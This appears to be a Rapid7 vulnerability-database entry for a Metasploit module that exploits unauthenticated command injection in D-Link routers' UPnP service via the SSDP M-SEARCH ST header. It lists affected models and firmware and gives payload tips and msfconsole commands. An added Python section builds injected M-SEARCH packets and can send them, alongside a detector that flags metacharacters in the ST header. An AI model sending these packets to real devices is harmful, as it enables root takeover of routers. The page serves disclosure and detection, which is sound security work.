Rapid7 Vulnerability & Exploit Database

D-Link Unauthenticated Remote Command Execution using UPnP via a special crafted M-SEARCH packet.

Disclosed
02/01/2013
Created
05/30/2018

Description

A command injection vulnerability exists in multiple D-Link network products, allowing an unauthenticated attacker to inject arbitrary commands into the UPnP service via a crafted M-SEARCH packet. Universal Plug and Play (UPnP) is enabled by default on most D-Link devices and listens for SSDP discovery traffic on UDP port 1900. An attacker achieves remote command execution by placing the payload in the `Search Target` (ST) header of an SSDP M-SEARCH discovery packet. After successful exploitation the attacker has full access to the device with `root` privileges.

NOTE: Staged Meterpreter payloads might core dump on the target, so use stageless Meterpreter payloads with the Linux Dropper target. Some D-Link devices do not have the `wget` command; on those, select the `echo` command stager flavor with `set CMDSTAGER::FLAVOR echo`.

The following D-Link network products and firmware versions are vulnerable:

  • D-Link Router model GO-RT-AC750 revisions Ax with firmware v1.01 or older
  • D-Link Router model DIR-300 revisions Ax with firmware v1.06 or older
  • D-Link Router model DIR-300 revisions Bx with firmware v2.15 or older
  • D-Link Router model DIR-600 revisions Bx with firmware v2.18 or older
  • D-Link Router model DIR-645 revisions Ax with firmware v1.05 or older
  • D-Link Router model DIR-815 revisions Bx with firmware v1.04 or older
  • D-Link Router model DIR-816L revisions Bx with firmware v2.06 or older
  • D-Link Router model DIR-817LW revisions Ax with firmware v1.04b01_hotfix or older
  • D-Link Router model DIR-818LW revisions Bx with firmware v2.05b03_Beta08 or older
  • D-Link Router model DIR-822 revisions Bx with firmware v2.03b01 or older
  • D-Link Router model DIR-822 revisions Cx with firmware v3.12b04 or older
  • D-Link Router model DIR-823 revisions Ax with firmware v1.00b06_Beta or older
  • D-Link Router model DIR-845L revisions Ax with firmware v1.02b05 or older
  • D-Link Router model DIR-860L revisions Ax with firmware v1.12b05 or older
  • D-Link Router model DIR-859 revisions Ax with firmware v1.06b01Beta01 or older
  • D-Link Router model DIR-860L revisions Ax with firmware v1.10b04 or older
  • D-Link Router model DIR-860L revisions Bx with firmware v2.03b03 or older
  • D-Link Router model DIR-865L revisions Ax with firmware v1.07b01 or older
  • D-Link Router model DIR-868L revisions Ax with firmware v1.12b04 or older
  • D-Link Router model DIR-868L revisions Bx with firmware v2.05b02 or older
  • D-Link Router model DIR-869 revisions Ax with firmware v1.03b02Beta02 or older
  • D-Link Router model DIR-880L revisions Ax with firmware v1.08b04 or older
  • D-Link Router model DIR-890L/R revisions Ax with firmware v1.11b01_Beta01 or older
  • D-Link Router model DIR-885L/R revisions Ax with firmware v1.12b05 or older
  • D-Link Router model DIR-895L/R revisions Ax with firmware v1.12b10 or older
  • probably more, given the scale of impacted devices :-(
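To make the attack surface concrete, the following is an added example in Python, not code from this Rapid7 page or from the Metasploit module. It builds an SSDP M-SEARCH datagram whose ST header is attacker-controlled, and, on the defensive side, parses a received M-SEARCH and flags any ST value that contains shell metacharacters or falls outside the UPnP search-target grammar. The backtick command-substitution wrapper in `injected_st`, the `LEGIT_ST` allow-list, the constructed sample packets and all function names are assumptions of this example; the page only states that the payload is carried in the ST field of the M-SEARCH packet sent to port 1900.

```python
"""Build and inspect SSDP M-SEARCH datagrams (UDP/1900).

Added example; not code from the Rapid7 page or the Metasploit module.
Assumptions (also stated in the lead-in):
  * injected_st() wraps the command in backticks. The page only says the
    payload lives in the ST header; the exact delimiter is an assumption.
  * LEGIT_ST follows the UPnP Device Architecture 1.1 search-target forms
    as the author of this example recalls them.
"""
import re
import socket

SSDP_ADDR = "239.255.255.250"
SSDP_PORT = 1900

# Shell metacharacters that never belong in a UPnP search target.
SHELL_META = re.compile(r"[`$;|&<>\n\r(){}]")

# Search targets a legitimate control point may send (UPnP DA 1.1, 1.3.2).
LEGIT_ST = re.compile(
    r"^(ssdp:all"
    r"|upnp:rootdevice"
    r"|uuid:[A-Za-z0-9\-]+"
    r"|urn:[A-Za-z0-9\-.]+:(device|service):[A-Za-z0-9\-.]+:\d+)$"
)


def build_msearch(st, host=SSDP_ADDR, port=SSDP_PORT, mx=2):
    """Return the raw bytes of an SSDP M-SEARCH request carrying ST `st`."""
    lines = [
        "M-SEARCH * HTTP/1.1",
        f"HOST: {host}:{port}",
        'MAN: "ssdp:discover"',
        f"MX: {mx}",
        f"ST: {st}",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("latin-1")


def injected_st(cmd):
    """ASSUMPTION: backtick substitution inside a uuid: search target."""
    return f"uuid:`{cmd}`"


def parse_msearch(datagram):
    """Split an M-SEARCH datagram into (request_line, {HEADER: value}).

    Returns None for anything that is not an M-SEARCH request.
    """
    text = datagram.decode("latin-1")
    head, _, _ = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    if not lines or not lines[0].upper().startswith("M-SEARCH "):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")  # first colon only; ST values contain ':'
        if sep:
            headers[name.strip().upper()] = value.strip()
    return lines[0], headers


def check_st(datagram):
    """Classify a datagram: ('benign'|'suspicious'|'not-msearch', st)."""
    parsed = parse_msearch(datagram)
    if parsed is None:
        return "not-msearch", None
    _, headers = parsed
    st = headers.get("ST", "")
    # Either rule alone is enough: metacharacters, or a target no client would send.
    if SHELL_META.search(st) or not LEGIT_ST.match(st):
        return "suspicious", st
    return "benign", st


def send_msearch(datagram, target, port=SSDP_PORT, timeout=2.0):
    """Unicast one M-SEARCH to `target` and collect replies until timeout."""
    replies = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(datagram, (target, port))
        try:
            while True:
                data, _ = sock.recvfrom(65535)
                replies.append(data)
        except socket.timeout:
            pass
    return replies


if __name__ == "__main__":
    # Constructed samples: a normal discovery and an injected one.
    for dgram in (build_msearch("ssdp:all"), build_msearch(injected_st("id"))):
        print(check_st(dgram))
```

The checker is the part worth wiring into an SSDP-aware sensor: a legitimate control point only ever sends the four ST forms in `LEGIT_ST`, so any other value arriving on UDP/1900 at a D-Link gateway is worth an alert, whatever the delimiter an attacker actually uses.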

Author(s)

  • h00die-gr3y <h00die.gr3y@gmail.com>
  • Zach Cutlip
  • Michael Messner <devnull@s3cur1ty.de>
  • Miguel Mendez Z. (s1kr10s)
  • Pablo Pollanco (secenv)
  • Naihsin https://github.com/naihsin

Platform

Linux,Unix

Architectures

cmd, mipsle, mipsbe, armle

Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use exploit/linux/upnp/dlink_upnp_msearch_exec
msf exploit(dlink_upnp_msearch_exec) > show targets
    ...targets...
msf exploit(dlink_upnp_msearch_exec) > set TARGET <target-id>
msf exploit(dlink_upnp_msearch_exec) > show options
    ...show and set options...
msf exploit(dlink_upnp_msearch_exec) > exploit
